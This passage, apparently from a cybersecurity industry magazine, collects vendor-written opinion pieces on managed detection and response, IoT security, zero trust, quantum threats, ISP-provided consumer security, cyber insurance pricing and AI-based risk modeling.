In late 2020, a Microsoft survey revealed that 82% of respondents planned to add security staff in the

coming year, while 81% also said that they needed to lower security costs. That’s a tough combination

to manage.

How does an organization add staff, while also lowering security costs?

The only way to do that today without increasing your organization’s attack surface is to outsource costly

security management burdens to service providers that are positioned to take advantage of economies

of scale.

Managed Detection and Response (MDR) service providers focus on one thing and one thing only –

security. They will have already optimized and automated much of the alert management process, and

MDR service providers will also have more resources to hunt threats, integrate alerts from third parties,

and detect zero-day threats before they cause problems.

However, when outsourcing MDR, it’s probably wise to find a security service provider that will also

provide complementary security services, such as managed SIEM and managed endpoint protection.

Prioritizing consolidation, certified partner solutions, and tested integrations will help you not only mitigate

alert fatigue, but also will help you embrace agile security as a core part of your organization’s ongoing

digital transformation efforts.

Learn more about how to maximize your existing investment in Microsoft Security or qualify for your

complimentary roadmap today!

About the Author

Derek Nugent is Vice President of Sales and Marketing for Difenda, a

SecOps-as-a-Service company. Before joining Difenda, Derek previously

served in leadership positions at Herjavec Group, Paladion, and CDW.

How to Protect All Five Stages of the IoT

Security Lifecycle

Smarter security for smart devices

By Mitchell Bezzina, Senior Director, Product Marketing, Cloud-delivered Security

Services, Palo Alto Networks

The dependency on IoT devices to enable business, capture data, and facilitate communication is

pervasive and continuing to evolve. While some of the most striking benefits of IoT revolve around

business process efficiency, productivity, and cost reduction, an increasing number of enterprises are

also recognizing IoT as an extraordinary source of intelligence with the ability to surface patterns or trends

within the information collected by these devices. Insights derived from IoT-generated data are proving

to be invaluable to business decision-makers.

This evolution is also introducing new security challenges for network and security teams alike.

Conventional network perimeter defenses and legacy processes are simply not equipped to address the

surge of new IoT security issues. The transformation opportunity for IoT-enabled business models in the

enterprise is massive. But to reap the benefits of transformation, enterprises need network security that

reliably enables IoT.

Today, IoT devices account for more than 30% of all network-connected enterprise endpoints.

Unique IoT Security Challenges

A growing number of IoT devices are virtually invisible in enterprise networks. From building and

streetlight sensors, flow monitors, surveillance cameras to IP phones, point-of-sale systems, conference

room technology, and so much more, IoT technology is on the network, in the organization, and

expanding rapidly.

These devices significantly expand an organization’s attack surface. Security teams are now faced with

new and escalating challenges which are unique to IoT security including visibility blind spots to inventory,

threats, risks and IoT data.

Take a Lifecycle Approach to IoT Security

Strategically minded CISOs and security leaders are moving beyond legacy solutions and taking a

complete IoT lifecycle approach, creating an IoT security posture that reliably enables IoT innovation and

protects the network from existing and unknown threats. The lifecycle approach encompasses five critical

stages of IoT security.

1. Understanding IoT Assets

The first stage in the IoT lifecycle requires gaining full visibility into the IoT attack surface, including

all known, unknown—and forgotten devices.

2. Assess IoT Risks

With the full visibility and context gained for both managed and unmanaged devices in stage one,

the risks these devices pose can be accurately assessed and monitored. Assessing risk in the

IoT security lifecycle requires real-time monitoring that continuously analyzes the behavior of all

the network connected IoT devices.

3. Automate risk-based security policy recommendations and enforcement

Taking into account that trust is in itself a vulnerability, an effective IoT security strategy must

directly align with the principle of Zero Trust to enforce policies for least-privileged access control

and network segmentation.

4. Prevent Known Threats

The diverse nature and use cases for IoT devices identified in the previous stages create a highly

distributed environment in the network with numerous points of compromise. Successful

outcomes of the security posturing in stage four of the IoT security lifecycle will require actionable

insights into the detection and prevention of known threats to the IoT devices for a swift response

to threat mitigation.

5. Detect & Respond to Unknown Threats

When it comes to detecting and preventing truly unknown threats, legacy strategies and

technology isolate threat data each organization receives and generates, creating silos and

reducing the possibility of prevention. To meet the requirements of the final stage of the IoT

security lifecycle, security teams need new capabilities and insights that draw from crowdsourced

threat intelligence. This last step will also uncover potential threats missed in earlier stages

thereby creating a cyclical process for continual improvement.

To learn more about IoT security best practices, read The Enterprise Buyer’s Guide to IoT Security, from

Palo Alto Networks.

About the Author

Mitchell Bezzina is the technology team leader with over 19 years of

experience in information security and endpoint forensics. Over the past

five years he has been focused on bringing new cybersecurity

technologies and services to market. In 2018 he drove the XDR market

revolution and industry creation while helping release Cortex XDR, the

first product in this space. Mitchell is currently focused on emerging

technologies like IoT Security and new innovations in Cloud-delivered

Security Subscriptions.

Mitchell Bezzina can be reached online at

mbezzina@paloaltonetworks.com and at our company website

https://www.paloaltonetworks.com/

The 2020 Internet Crime Report includes information from 791,790 complaints of suspected internet

crime—an increase of more than 300,000 complaints from 2019 and reported losses exceeding $4.2

billion. The most hacked industries include government, retail, and technology, due to the high level of

personal identifying information that they are known to hold - making a cyberattack very profitable.

In October 2021, the White House Office of Science and Technology Policy (OSTP) convened industry

stakeholders from across the country to discuss how quantum computers and quantum sensors will

benefit American society. While holding a lot of promise, quantum technology also poses unique risks to

enterprises, governments, and individuals around the world. With Quantum computing-related cyber

security threats, assuming a breach has already occurred and using a zero trust-based approach will be

even more important.

More Than A “You’ve Been Breached

Mentality” - Zero Trust, Quantum Computers,

And the Future of Cyber

By Dr. Torsten Saab, Principal Engineering Fellow, Raytheon

Quantum technology and the potential of Zero Trust

Quantum Day or “Q-Day,” while 5-10 years out, is coming faster than we would like and it represents the

day that quantum computers will reliably use the superpositioning power of qubits (i.e., information bits

that can assume multiple states at once) to compute the codes needed to break asymmetric encryptions.

With that said, the arrival of Q-Day may rely on Zero Trust strategies as nations work to prepare for the

cyber risks that will inevitably accompany these computing advancements. We can no longer have this

‘castle-and-moat’ mindset, where we are hyper-focused on defending the perimeter, believing everybody

and everything already inside our network belongs there. We must assume that the bad guys are already

inside, accessing our data, and using “collect now, decrypt later” strategies.

Zero Trust teaches us important security concepts and ideas, such as:

● “Never trust, always verify”

● A "you've been breached" mentality

● The replacement of traditional perimeter-based security

● An introduction to micro-segmentation and multi-factor authentication

● The incorporation of contextual analysis into the IT resource access decision-making process

Outlining a Plan of Action

In response to the challenges that Zero Trust holds, Raytheon Intelligence & Space (RI&S) offers the

expertise and flexible solutions to rapidly develop and implement a future-proof Zero Trust strategy that

will best fit an organization. For example, its highly scalable and extensible Zero Trust security platform

called REDPro ZTX (short for Raytheon Enterprise Data Protection with Zero Trust Extended) monitors

users, devices, networks, workloads, and data in real-time. It enables plug-and-play of multi-vendor Zero

Trust solutions; enforces least-privilege access; continuously verifies access requests; and facilitates

real-time, multi-level cyber response.

An effective and comprehensive Zero Trust solution must seamlessly provide multi-level Zero Trust

monitoring and policy enforcement at the edge, on premise, and in the cloud. RI&S’s REDPro ZTX

solution even goes a step further by combining cross-platform Zero Trust security with cyber resiliency.

Cyber resiliency adds important security features, such as independent hardware and software

attestation, self-healing, and deception.

REDPro ZTX allows customers to interchangeably plug-and-play defense-grade Zero Trust and cyber

resiliency technologies from RI&S and industry partners. Having modular building blocks allows

customers to decide which pillars of the Zero Trust model – users, devices, networks, workloads, and

data – they would like to focus on first and how to achieve comprehensive Zero Trust coverage over time.

RI&S’s modular and extensible REDPro ZTX platform was designed to speed up the deployment of Zero

Trust security across heterogenous IT (Information Technologies) and OT (Operational Technologies)

environments, while also lowering the technical risk, streamlining cyber security operations, and reducing

response times.

In addition to deploying Zero Trust security-based systems as soon as possible, organizations should

also consider developing a Quantum Security (QS) strategy and incorporating it into their ZT strategy. A

QS strategy, for example, could include the adoption and deployment of Post-Quantum Cryptography

(PQC), Quantum Random Number Generators (QRNG), and Quantum Key Distribution (QKD) systems.

Given the continuously evolving cyber threat landscape, including potential data security threats posed

by code-breaking quantum computers, the time to incorporate zero trust and quantum security into one’s

cyber strategy is now.

About the Author

Dr. Torsten Staab is a Raytheon principal engineering fellow. He

serves as Chief Innovation Officer for Raytheon Intelligence &

Space's Cyber, Intelligence, and Services business unit. In addition,

Staab also serves as Chief Technology Officer for Raytheon

Blackbird Technologies, Inc., a wholly owned subsidiary of

Raytheon Technologies.

Staab has an extensive background in software and systems

engineering. He is a recognized subject matter expert in areas such

as cybersecurity, data analytics, machine learning, distributed

systems and laboratory automation. He has contributed to more

than 50 publications, as well as five issued and five pending patents. He received a Diplom Informatiker

(FH) degree from the University of Applied Sciences in Wiesbaden, Germany. In addition, he also holds

master of science and doctorate degrees in Computer Science from the University of New Mexico.

Dr. Torsten Staab can be reached online on LinkedIn. See our company website at

https://www.raytheonintelligenceandspace.com/.

It’s time for Internet Providers to Become

Primary Security Providers

Consumers want cybersecurity protection, and they consider their CSPs as potential partners

By Barry Spielman, Director of Product Marketing, Allot

Most people are utterly unprepared for cyberattacks. Most people will be affected by cyberattacks.

Fortunately, most people have the potential to thwart many or most of the cyberattacks that target them.

The problem is that they don’t yet know about the defensive weapons that are starting to become

available from the very vehicle that brings cyberattacks to their devices. I am, of course, referring to

communication service providers, or CSPs. The telecom carriers and Internet providers who bring

connectivity to your home, office and right to your fingertips when you’re on the go are the perfect solution

providers for the ubiquitous cyber threats that are increasingly plaguing businesses and individuals

around the globe.

With the cost of cybercrime, according to one estimate, expected to rise to $10.5 trillion USD annually by

2025, compared with $6 trillion USD in 2021, there is no real way for crime fighters to outspend the cyber

criminals. But crime fighting is not the most effective way to combat cybercrime. It would be far more

effective to find a way to block the criminals before their attacks reach their targets. Now, you might say

that these methods have been around for years. But if they were effective, wouldn’t the cost of cybercrime

be dropping?

The truth is that cybersecurity solutions for regular people are missing an element that causes them to

be far less effective than they need to be. It’s not that they are lacking in technology standards or features.

There are many consumer cybersecurity solutions that are very good at what they do. The problem is

that people either don’t use them properly, or don’t use them at all. It’s hard to pinpoint why that is exactly.

But it probably lies somewhere between the fact that people are just busy with their lives and don’t get

around to cybersecurity tasks and the fact that there are so many options available that people don’t

know which ones are reliable.

When it comes to cybersecurity solutions for large enterprises, no expense is spared. There are teams

of professionals using an array of advanced tools to block, isolate, eliminate and prevent infections and

attacks. Meanwhile, as robust and effective as consumer tools for cybersecurity might be, the vast

majority of consumers lack the skills and even the basic knowledge to protect themselves properly, even

with a wide selection of available tools. What’s more, regular people need to be protected from infection

and attacks when they are connected to their mobile networks, in their home networks and when

connected to guest Wi-Fi networks. They need to protect all their devices, all of the time.

One particular vulnerability comes from IoT devices in people’s homes. The number of IoT devices

ranging from home appliances, to surveillance devices and home automation, is skyrocketing. Each

device acts as an open door for cybercriminals to invade people’s home network. With limited CPU and

memory, most IoT devices are designed with little or no capacity for security measures. Since passwords

are often left as the default, if there are passwords at all, IoT devices make easy entry points into the

network, giving cybercriminals access to personal data and other digital assets. These and other

vulnerabilities leave consumers wide open to attacks and infections.

That doesn’t mean that regular people are not interested in protecting themselves. In a recent survey by

Allot and Coleman Parkes Research, consumers expressed concern with virus infection (62%), loss of

privacy (59%), loss of sensitive data (59%), phishing attacks (51%) and other consequences of cyber

threats. In fact, they responded that they would, on average, be willing to pay $4.74 per month for a

comprehensive cybersecurity service provided by their CSP. However, in North America, 53% of

respondents said that they were not investing in securing their Internet-connected devices because they

did not know how to do it. In other words, consumers are concerned about cyber threats, and they are

willing to pay to be protected as long as it is easy.

In the same survey, 90% of respondents globally said that they believed that their internet provider should

also provide the security to protect them when they use the Internet. In fact, 68% said they would switch

providers to be on a more secure network. This raises the question: Where should consumers get their

cybersecurity protection?

Based on the responses of consumers, there is good reason to believe that communication service

providers can provide cybersecurity protection services that their customers will trust enough to subscribe

and use. This can be the case as long as the price is right and subscribers do not have to do much to

take advantage of these services. As it turns out, CSPs are perfectly positioned to provide cybersecurity

services that can meet all the requirements of their customers.

CSPs can integrate cybersecurity services into their network infrastructure and use the tools that they

already have for fast, widespread provisioning of services. When the solution sits in the network, as

opposed to the customers end device, it can block attacks before they reach and affect the device.

Network-based also means that the service can be ‘zero-touch’. In other words, people are protected

without having to do anything: No downloading, no installation, no configuration necessary. A CSP’s

customer can simply say yes and the service is activated. But if those aren’t good enough reasons for a

CSP to consider offering cybersecurity services, they might be encouraged by the potential of generating

recurring revenue from a service that has proven to be wildly popular with consumers when it is made

available to them by their CSP.

At Allot, we have seen upwards of 50% uptake on network-based cybersecurity services offered by CSPs.

With numbers like that, not only can a CSP differentiate their brand as a security provider, they can also

earn a significant amount of supplemental revenue with cybersecurity service offerings to consumer

mobile customers and home network customers. With solutions that offer 360 degree protection, A CSP

can offer a comprehensive service that protects customers where ever they are and on any device. That

could be an important step toward eliminating cyber threats in the consumer market.

About the Author

Barry Spielman is the Director of Security Product Marketing at Allot.

Prior to joining the Allot team Barry held marketing management

positions at networking and cybersecurity companies including Sixgill,

Verint and Gilat Satellite Networks. He holds a BA in Political Science

from Bar Ilan University, an MA in International Relations from George

Washington University and an MSM in Business Administration from

Boston University.

Barry can be reached online at (bspielman@allot.com) and at our

company website http://www.allot.com/

As a cybersecurity professional and a reserve field officer in the Israeli military, I have found many

valuable insights on the pages of The Art of War, written by the fifth century Chinese military general Sun

Tzu. One particular but often overlooked passage titled “Attack by Stratagem” is particularly relevant

today as we face an infinite number of cyber threats and ever-growing lists of vulnerabilities. More than

ever, we need to prioritize—both what we need to protect in order to keep businesses and organizations

running, and what attackers are likely to target–and this powerful passage that has been guiding warriors

for centuries holds important wisdom on how to do that, and why it is so important:

“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know

yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the

enemy nor yourself, you will succumb in every battle.”

Let’s fast forward 3,000 years and break this down in terms of cybersecurity, where we are indeed facing

hundreds of battles everyday.

“Know your enemy”

In our line of work, it is crucial to define and locate potential threats. For example, I have worked in

organizations that did not take the time to understand the impending threat and instead spent their time

building an elaborate defense system to fend off only general and vague persistent threats. Conversely,

I have worked with some of the most sensitive of security teams that were so focused on one particular

threat that they did not dedicate enough resources towards building a comprehensive defense system.

Both examples did not take these simple three words into account.

The key to an effective defense strategy is defining who the threat actor is and what threats they are

making. In cyber terms, this means tracking the threat actors’ TTP, or tactics, threats and procedures, to

learn more about them. But that is not all; organizations must act on the intelligence they have, including

using it to help them hire appropriate cybersecurity professionals. For example, if organizations determine

“Know your enemy,” and other

cybersecurity lessons from Sun Tzu’s Art

of War

The key on the cyber battlefield, like on the traditional military battlefield, is understanding

that there will indeed be many battles

By Shmulik Yehezkel (Colonel, res), Chief Critical Cyber Operations Officer at CYE

Security

they are facing threats from state-backed actors, they need to make sure they have cybersecurity

professionals on their team with experience in military or government IT or cyber divisions.

When you can understand the mindset of your enemy, you remain one step ahead in many ways.

“Know yourself”

Immediately following the awareness of the enemy, Sun Tzu tells us to know ourselves.

In our experience in the industry, we have seen organizations totally unaware of their assets or which of

them required protection. For example, as thousands of organizations, from Apple to Belgium’s defense

ministry, continue to deal with the ongoing global Log4J vulnerability, millions more are likely not even

aware that they use this open-source library, and are thus exposed to what the top U.S. government

cyber security official has called one the most serious vulnerabilities ever. In general, in more than 75%

of the cases in which we have handled an attack over the years, the victimized organization did not even

know the layout of its networks. In fact, attackers knew and understood the networks and assets better

than these organizations.

In addition, organizations need to quantify risk, to understand what attacking each of their digital assets

ultimately means for the business. Depending on what they hit, cyberattacks have different effects on an

organization or business, from shutting down its website to obtaining proprietary information like customer

details or intellectual property to sell on the Dark Web, to disabling essential services like gas pipelines.

“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.”

Cybersecurity today is a combination of knowing yourself and the enem. Even if a company has carried

out thorough security testing and prioritized all of its assets in relation to overall business risk from cyber

attacks, but still doesn’t fully understand the most likely enemies or potential attackers–and respond

accordingly– it will not only still suffer defeat many times, but will be unprepared in case an attack does

happen.

Understanding the enemy and what they may want helps companies make appropriate and effective

contingency plans in case attacks happen. For example, if organizations know that attackers are likely to

ask for ransom, they can seek legal advice on the matter and understand the ramifications of paying,

which often does not actually lead to recovering all data. Or, if they know that attacks are likely to come

via the software supply chain, they can plan accordingly, including offering extra training on cyber hygiene

to their entire workforce. Today, responding to a cyber attack is no longer just about dealing with data

recovery, but it has far-reaching legal, financial and even physical consequences, like interrupted utility

services or frozen assembly lines.

”If you know neither the enemy nor yourself, you will succumb in every battle.”

After the above discussion, this last sentence is obvious in its meaning. But it also serves as a warning,

as many organizations remain woefully unprepared. Blindly investing in more and more technology and

tools or basing security on compliance with regulations is not enough.

The key on the cyber battlefield, like on the traditional military battlefield, is understanding, as Sun Tzu

writes, that there will indeed be many battles. And businesses must prepare for those battles by

understanding and quantifying their cyber risk continuously, and constantly monitoring who may attack

them and by what means.

Cyber incidents are widespread; businesses must be proactive, to act as a hunter and not a fisherman

waiting for something to bite the line. They must execute “find evil” operations, have continuous

intelligence activity for threat discovery, and practice their Cyber Response Plan because there will be

many battles.

About the Author

Colonel (res.) Shmulik Yehezkel, Chief Critical Operations

Officer at CYE, has over 26 years of experience in the

Israeli Defense Special Forces of the IDF. Shmulik is a

software engineer and a cybersecurity professional with

extensive strategic and hands-on experience. Shmulik

brings years worth of knowledge leading operations,

information security, and emergency and risk management

in the IDF, the Ministry of Defense, and the Office of the

Prime Minister of Israel. As CYE’s Chief Critical Operations

Officer, Shmulik leads the data forensics and incident

response (DFIR), threat hunting, and computer threats

intelligence (CTI) activities. His team consists of national-

level security experts and senior intelligence officers. The

team is tasked with bringing CYE’s ability to predict and

anticipate cyber threats and provide commercial

companies with the support and expertise they need to respond to cyber incidents.

Email: shmuel.yehezkel@cyesec.com website: www.cyesec.com

Why Zero Trust is Easier Said Than Done

By John Vecchi, CMO, Anitian

Zero trust security has made its way into the offerings of most enterprise security companies while

becoming a critical and new modern architecture adopted by the Department of Defense (DoD) and the

federal government. However, many organizations today have built their information security programs

around more traditional security technologies and methodologies. Moving to — and modernizing for —

zero trust security is not as simple as adopting a single point technology or running a single scan. Here’s

why.

Comparing Zero Trust to Traditional Approaches

If we contrast a modern, zero trust approach to traditional, legacy security approaches, it’s

understandable why the National Security Agency (NSA), Department of Defense (DoD), Defense

Industrial Base (DIB), and the Biden Administration’s Executive Order on Cybersecurity are all mandating

Zero Trust Architectures (ZTA).

Yesterday’s legacy security strategy was built around a more traditional “internal trust” approach. The

idea is that once inside the trusted zone, applications and systems can freely communicate. Access to

the internal trusted zone is granted by passing users through a principal perimeter defense – in most

cases a next-generation firewall. This makes it easier for attackers, as once they’ve stolen legitimate

credentials or found other methods to bypass the perimeter defense, they can gain full access to the

trusted zone where they can move laterally into the network. In these traditional security environments,

the network perimeter is the primary mechanism for enforcing access. Its focus on maximum

interoperability means that the default posture is to connect to everything, without asking what or why

users and systems really should be connecting to or how we should be controlling access to minimize

risk and data breaches.

Zero trust security and architecture is designed to address these questions, building security on a default

foundation where no user or system should be allowed access to a resource until a certain level of trust

has been established. In a zero trust environment, every connection and all access are explicitly defined,

authorized, and constrained with each connection attempt. When a service (such as a system,

application, container, etc.) needs to connect with another service, that connection must use a valid

authentication method, pass some level of authorization, and be constrained and/or controlled to a strict

“need to know” basis for access. Hence, a default posture of “zero trust” until you prove to be trusted. But

even then, it’s only for that specific instance.

Zero Trust in the Real World

As an approach and architectural concept, zero trust is relatively simple. But as a practical, best practice

to architect and deploy, zero trust can be difficult. This is mostly because today’s existing, legacy security

environments are not designed, built, and deployed around zero trust principles.

Especially in today’s DevOps-driven cloud environments, development teams often build application and

service environments in “full trust” mode with little-to-no access restrictions or security controls. Only after

the application and cloud environment are built do security and DevOps teams work to implement security

controls and access restrictions on the production environment. In essence, the environment begins in a

vulnerable state. And, as the complexity of the cloud environment grows, the complexity of the security

controls and enforcement grows along with it. If certain controls or configurations are missed or

inaccurate, then the environment can be left vulnerable. According to Verizon’s 2022 Data Breach

Investigations Report, misconfiguration errors scored as the highest source of data breaches.

In contrast, if a zero trust architecture and approach were deployed and enforced by default, the

environment would be inherently secure, with no user or system having access. Not only would the

granting of access be a required and overt act, but the number of services also needing access and the

scope of the access would be finite and on a need-to-know basis. So, once you grant a system or user

the appropriate access — while automating the application of those rights — you’re done. And, since this

approach is deployed and enforced automatically and by default, the inherent security of the environment

grows more seamlessly and at the same rate as the environment itself (and its complexity).

Achieving Zero Trust through Automation

If a cloud infrastructure environment is pre-built, pre-configured, and standardized using automation —

with a cloud-native platform that deploys in a day (directly in your own AWS or Azure account) and is pre-

built to NIST 800-53 to enforce zero trust by design and default — then a modern zero trust architecture

can be achievable and affordable for any size enterprise or organization. As such, developers can now

build their cloud applications within the confines of zero trust principles as soon as they begin, even as

early as day one. This means access rights become an integral component of the DevOps process and

a critical part of automated configuration management practices. As new applications are added to the

environment, developers work more seamlessly with security practitioners and DevSecOps teams to

configure access rights, authorization, logging, and other key infrastructure components.

Now, rather than having individual people tinkering with security tool configurations and access rights,

developers can code rights into automation scripts, then run those scripts against test environments,

evaluate their success, and perfect those scripts over time. Security practitioners and secure DevOps

teams can likewise automate the evaluation of access rights, quickly identifying overly permissive rights,

compliance drift, and other potential threat vectors. As a result, security and SecOps teams can use

automation to quickly revert access, find and fix misconfigurations, and identify indicators of compromise

(IOCs).

All this boils down to the fact that a zero trust approach appears to be the right way to improve your cloud

security posture and the world is going in that direction. Of course, there are multiple ways to get there.

Some paths seem faster and more logical than others. Now it’s up to you to choose.

About the Author

John Vecchi is the Chief Marketing Officer (CMO) of Anitian. As Chief

Marketing Officer, John brings more than 24 years of experience in high-

tech marketing, strategy, product marketing, product management, sales

and consulting. Most recently, John was Chief Marketing Officer at

ColorTokens and Anonyome Labs. Previously, he served as senior vice

president of product marketing and strategy for Blue Coat Systems, Chief

Marketing Officer for Solera Networks (acquired by Blue Coat), Vice

President of WW Marketing at Zscaler, Head of Global Product Marketing

& Strategy for Check Point Software, as well as executive marketing

consultant for Symantec and Sr. Director of Product Marketing for McAfee’s

Network Security Business Unit. John still serves as an Advisor at Signal

Peak Ventures and has a B.A. from the University of St. Thomas, St. Paul, MN, focusing on international

business and foreign language. As CMO, John oversees global marketing, branding, communications,

press & analysts, and go-to-market strategy & execution.

John can be reached online on LinkedIn: https://www.linkedin.com/in/johnvecchi or Twitter:

https://twitter.com/johnvecchi and at our company website https://www.anitian.com/

It may not have attracted as much attention as the coronavirus, but ransomware has become a pandemic

unto itself – and it’s sending the price of cyber insurance skyrocketing. Here’s what you can do to keep

your premiums as low as possible.

Cyber insurance is a relatively new addition to the insurance market that helps to protect organisations

from the fallout of being hacked and is typically available to cover:

• Costs related to the loss of or damage to data

• Content-related claims related to data

• Costs to prevent future breaches

• Fines and penalties imposed by regulators

• Public relations costs

• Liability for denial of service from or access to electronically provided data

• Costs associated with cyber extortion reimbursement

• Compensation to third parties for failure to protect their data

Why Are Cyber Insurance Premiums Going

Up, And How Can You Get a Better Deal?

By Jamie Wilson, MD & Founder, Cryptoloc Technology Group

But at a time when more organisations are clamouring for these sorts of protections, cyber insurance

carriers are raising premiums and limiting the coverage they’re willing to offer.

In a recent report entitled Cyber insurance: A hard reset, multinational insurance broker Howden reported

that global insurance pricing had increased by an average of 32 per cent from June 2020 to June 2021.

Similarly, insurance broker Marsh’s latest Global Insurance Market Index found that cyber insurance

premiums shot up 56 per cent in the US and 35 per cent in the UK from the second quarter of 2020 to

the second quarter of 2021.

Marsh reports that Australian businesses, specifically, have been slugged with cyber insurance premium

jumps of up to 30 per cent, and those prices are expected to just keep rising.

Why are cyber insurance premiums going up?

Essentially, cyber attacks are becoming too common for the insurance sector, which relies on businesses

insuring themselves against scenarios that might not end up happening for its profits. With hacks

becoming a virtual inevitability, safeguarding businesses against them is an increasingly shaky prospect

for insurers.

According to both the Howden and Marsh reports, it’s the frequency and severity of ransomware attacks

– in which cybercriminals take control of a network and demand payment to hand it back – that are driving

cyber insurance prices skyward.

The number of ransomware attacks worldwide shot up 170 per cent from the first quarter of 2019 to the

fourth quarter of 2020, according to Howden, while the average cost of a ransomware attack is up 145

per cent in 2021 compared to 2020.

There are a number of reasons for the rise of ransomware, including the availability of low-cost

ransomware kits and ransomware-as-a-service (RaaS) offerings that enable users to launch ransomware

attacks without any technical expertise on their part, effectively lowering the barrier to entry to the

cybercrime ‘industry’.

The proliferation of double extortion is also a factor – in a double extortion attack, not only do

cybercriminals take control of your system and demand payment for its return, but they also threaten to

leak the data they’ve stolen from you, and demand a separate payment not to do so. Ransomware group

REvil had the dubious honour of being the first to use the double extortion tactic in June 2020, and it’s

since taken off worldwide.

As is so often the case, the COVID-19 pandemic is also partly to blame. The sudden explosion in remote

work and the acceleration in digitalisation that has come with that has exponentially increased the attack

surfaces that are available to cyber criminals, and made it harder for breaches to be discovered.

IBM and Ponemon’s Cost of a Data Breach Report 2021 found that data breaches were 17.5 per cent

more costly where remote work was a factor, and that organisations that had more than half of their

workforce working remotely took 58 days longer to identify and contain breaches, on average.

Not only has the rash of ransomware attacks sent cyber insurance premiums soaring, it’s also affected

the coverage that some insurers are willing to offer. In May, French insurance giant AXA announced it

would no longer write policies that reimburse ransomware victims – and were immediately hit with a

retaliatory ransomware attack – while other insurers are declining to take on new clients, or capping their

coverage at about half of what they used to offer.

How can you lower the cost of your cyber insurance policy?

A wide range of factors can impact your cyber insurance premium, including the size of your business

and its annual revenue, the industry you operate in, and the type of data you have access to.

But in much the same way that a high-risk driver will have to pay more for car insurance, the Howden

report found that insurers are demanding more from business’ cybersecurity, and will charge

organisations that are more likely to fall victim to a breach a higher premium – or refuse to insure them

altogether.

This is in line with a recent letter from the Insurance Council of Australia to the Department of Home

Affairs, in which the Insurance Council wrote: “Insurance underwriters place a strong focus on a

customer’s risk management and security culture when reviewing, assessing and pricing the risk.

Effective risk management, including a strong internal security culture, can be the most effective defence

against threats.”

This might seem like a no-brainer, but it hasn’t always been this way. In the past, insurers might have

just asked potential clients to fill out a questionnaire about their cybersecurity practices, and taken them

at their word that their house was in order.

In today’s environment, however, these insurers are partnering with outside firms to vet potential clients’

cybersecurity protocols, and demanding to see evidence that they have appropriate controls in place and

are following best practices, including using multi-factor authentication, implementing zero trust policies,

and backing up and encrypting their data.

For instance, the IBM and Ponemon report on the cost of data breaches found that organisations using

high standard encryption – at least 256 AES, at rest and in transit – had an average breach cost that was

29.4 per cent lower than organisations using low standard or no encryption. Insurers, who are likely to

be aware of that data, might then offer broader cover and better pricing to organisations that can

demonstrate they’re using strong encryption technology.

Companies who take a proactive approach by providing cyber security education for all employees,

including advice on how to identify suspicious emails and requests, are also likely to be looked upon

favourably by insurers.

“Carriers… are demanding extremely high cyber security standards,” says Shay Simkin, Global Head of

Cyber at Howden.

“Impeccable cyber security hygiene is therefore crucial for companies looking to purchase cyber

insurance cover. Not only does it open up capacity availability, it also helps provide more favourable

pricing and terms.”

Or, as the Insurance Council of Australia puts it: “Capabilities that indicate a strong risk management and

security culture may, for instance, include internal data handling and internet usage policies for all

employees across the business, adequate prevention, detection, and response security capabilities and

internal data breach incident response plans. Guidance and resources that support businesses,

especially small businesses, to protect themselves against cyber threats can strengthen risk

management and security practices.”

This isn’t a set-and-forget proposition, either. In many cases, insurers will reassess their policies every

12 months, so even after you use your organisation’s preparedness to get a good deal on cyber

insurance, you’ll need to ensure you maintain those high standards and keep the proper procedures in

place.

Then again, why wouldn’t you? Cyber insurance is not, in and of itself, a cybersecurity strategy, and no

matter how low your premium is and how great the terms of your coverage are, it should only be used as

a last resort. The best response to a breach is still to avoid being breached at all.

At the end of the day, if your business never has to make a cybersecurity claim, it’ll be a win for your

insurer – but it’ll be a win for you and your clients and customers, too.

With its unique three-key encryption technology, Cryptoloc is the world’s safest cybersecurity platform.

To show you take data management seriously, visit cryptoloc.com.

About the Author

Jamie Wilson is the founder and chairman of Cryptoloc,

recognized by Forbes as one of the 20 Best Cybersecurity

Startups to watch in 2020. Headquartered in Brisbane,

Australia, with offices in Japan, US, South Africa and the UK,

Cryptoloc have developed the world’s strongest encryption

technology and the world’s safest cybersecurity platform,

ensuring clients have complete control over their data. Jamie

can be reached online at www.linkedin.com/in/jamie-wilson-

07424a68 and at www.cryptoloc.com

AI/ML Powered Risk Modeling: A Decision-Making

Framework

By AJ Sarkar, Founder and CEO of OptimEyes.ai

A company’s C-suite and directors assess cyber threats based on the potential impact on high-level

business objectives. How will a particular attack impact year-over-year growth? Client experience and

trust? Company reputation? An anticipated expansion or product launch?

The information security operations team, on the other hand, needs technical details to execute an

effective tactical defense, hold the hackers at bay, and minimize damage.

In the middle, CISOs assess vulnerabilities within network segmentation, architecture, governance,

operations and processes. They watch for threats and work with their counterparts throughout the

business to stop impacts from rippling across the organization. This requires effective, efficient

communication across the enterprise – with info-sec ops, business unit leaders, and the CEO, CFO, CIO,

CCO, and CRO, among others.

These stakeholders, of course, assess the same situation through different perspectives, with different

responsibilities, objectives, jargon, and success metrics. They need a common language to communicate

about threats and ensure the implications — for supply chains, customer experience, operations, financial

performance, data privacy compliance and more – are understood and managed effectively.

Until recently, there has been no common language for managing risk across the organization, let alone

up to the board. Limitations in the effectiveness of risk monitoring, quantification and benchmarking have

only exacerbated the problem.

Flying Blind

Despite advances in technology, most organizations lack continual, real-time monitoring of cybersecurity

vulnerabilities or a comprehensive picture of risk across the enterprise. Data needed to assess risk impact

often is collected at a single point in time, assessed manually in spreadsheets, and analyzed in isolated

functional silos. This leaves companies flying blind, lacking a big-picture risk assessment, and likely to

miss emerging issues until they escalate into crises. This traditional approach to managing risk leaves

companies exposed when trying to understand and deal with the ferocity of today’s threats and

challenges.

Reporting to executive teams routinely occurs quarterly, biannually, or annually and lacks a timely, holistic

view of overall enterprise risk, so leaders struggle with risk prioritization and proactive, strategic planning.

Consider this: only 30% of organizations surveyed for PWC’s new 2022 Global Digital Trust Insights

Report quantify their cybersecurity risk.

As a result, in most companies the C-suite lacks the timely information and context they need to make

sound, informed decisions. How big is the threat? How does it compare with other threats on the horizon?

What is the potential impact on the company’s key objectives? Without adequate risk-assessment data

to analyze situations, prioritize responses, set policies and allocate resources, many simply rely on

intuition, best guesses or a stab in the dark.

At the same time, many CISOs also lack a view of the big picture – and, therefore, the ability to confidently

advise the C-suite or direct the info-sec ops team to aggressively target and mitigate the greatest threats.

Timely and comprehensive data, robust analytics, and intuitive data visualization are needed in tandem

to tell the complete story and ensure each group within the hierarchy – leadership, management, and

ops – understands the situation and can fulfill their roles and responsibilities and support each other.

A Universal Translator

To create a common risk language for cross-organizational communication, it is the ability to garner and

